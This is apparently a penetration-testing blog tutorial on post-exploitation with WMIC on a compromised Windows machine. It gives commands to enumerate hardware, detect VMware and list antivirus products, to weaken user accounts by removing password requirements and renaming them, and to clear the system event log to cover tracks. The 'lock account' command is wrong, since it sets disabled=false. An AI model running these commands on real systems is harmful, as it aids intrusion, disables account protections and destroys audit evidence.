We can get the information about the Hard Disk Partitions using the logicaldisk alias.

We get the name, compression status, File System (NTFS, FAT) and much more all using this command.

wmic logicaldisk where drivetype=3 get Name, Compressed, Description, FileSystem, FreeSpace, SupportsDiskQuotas, VolumeDirty, VolumeName

From given below image you can read the description of the disk along with filesystem i.e. NTFS and available free space and many more details as per your requirement.

Get Memory Cache Details

We can get the information about the Memory Cache using Memcache alias. We can get the name, block size, purpose and much more all using this command.

wmic memcache get Name, BlockSize, Purpose, MaxCacheSize, Status

From given below image you can observe here it is showing details of two cache memory.

Get Memory Chip Details

We can get the information about the RAM using the memorychip alias.

We get the Serial number of the RAM without removing the RAM or physically being near the system using this command.

wmic MEMORYCHIP get PartNumber, SerialNumber

Detect If victim system is a host OS or installed via VMware

We can enumerate information about the victim’s system that whether it is running a host operating system i.e. running by directly installing on the hard drive or running virtually using VMware or Virtual Box.

wmic onboarddevice get Desciption, DeviceType, Enabled, Status /format:list

Here from given below image if you will observe the highlighted text when you see it showing VMware in the description.

User Account Management

Lock a User Account

We can restrict a local user from using its account by using useraccount alias, here we are going to lock a User Account.

wmic useraccount where name='demo' set disabled=false

From given below image you can observe that we had successfully locked the user account for user “demo”.

Remove Password requirement for logging

We can remove a local user’s requirement of its password for login by using useraccount alias

wmic useraccount where name='demo' set PasswordRequired=false

Rename a user account

We can rename a local user by using useraccount alias

wmic useraccount where name='demo' rename hacker

Restrict user from changing a password

We can restrict a local user from changing its password by using useraccount alias

wmic useraccount where name='hacker' set passwordchangeable=false

Get Antivirus Details

We can enumerate the antivirus installed on the victim’s system along with its location and version.

wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName, productState, pathToSignedProductExe

Clear System Logs

Wmic can be used to delete system logs using the nteventlog alias. It is a very simple command where we mention the name of the log and then using an option nteventlog and clear the log file. It can be an effective command while cleaning up after hacking any system.

Syntax: wmic nteventlog where filename='[logfilename]’ cleareventlog

wmic nteventlog where filename='system' call cleareventlog

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Post Exploitation Using WMIC (System Command) appeared first on Hacking Articles.